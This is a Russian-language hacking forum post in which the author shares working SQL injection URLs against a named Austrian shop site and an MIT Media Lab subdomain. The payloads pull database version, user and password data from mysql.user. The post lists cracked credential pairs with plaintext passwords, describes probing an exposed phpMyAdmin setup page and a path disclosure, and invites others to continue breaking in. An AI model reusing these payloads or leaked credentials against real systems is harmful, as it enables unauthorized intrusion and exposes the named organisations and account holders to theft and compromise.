Лови:
http://www.landmetzgerei.at/cart.php?action=add&id=-1+union+select+1,2,convert(concat_ws(0x3A3a,versio n(),user(),database())+using+latin1),4,5,6,7,8,9/*
Таблицы не подбирал, это уж сам давай.
_____________________________
Цель - media.mit.edu, пр8, начал копать
http://affect.media.mit.edu/projects.php?id=-1935+union+select+1,2,3,concat_ws(0x3A3a,user,pass word),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23+from+mysql.user/*
таблицы не подобрал.
Хеши которые сбрутились:
Quote:root::1c3b7f0b58c961df :: DufwtDB!
antigroupware::3f6686f4521deef9 :: wonderful
rcaneel::0d90c1511e59b951 :: failsafe
остальные в очереди.
На madnet.name/tools/madss/ пробил по ReverseIp, сайтов там на серваке стопицотсотинтыщь.
Куда с этим рутом коннектицца я х.з. phpmyadmin нужный не нашёл, накопал lyme.media.mit.edu/pmadmin/ ,там авторизация, пассы канешн неподходят.
Лезу _http://lyme.media.mit.edu/pmadmin/scripts/setup.php пустило, права видать криво стоят;
lyme.media.mit.edu/pmadmin/scripts/ просматриваем файло.Версия phpMyAdmin 2.11.2, уже с**** третяя за 3 дня.
Раскрытие путей-/var/www/cerebro.old/includes/, толку 0.
Этот грёбанный поддомен в списке сайтов от целевого на серваке не присутствует, он и под другим ip.
Куда вобщем с этим рутом лезть я не знаю.Делаю вывод, что раз media.mit.edu -- affect.media.mit.edu на одном серваке, значит рут (полученные пасс\логин) целевой. Но найти зацепку к коннекту немогу.
phpMyAdmin from lyme.media.mit.edu вообще фэйк какой то.Всё ужасно криво. Если кто что накопает, обьявите плз. Уже чисто ради интереса.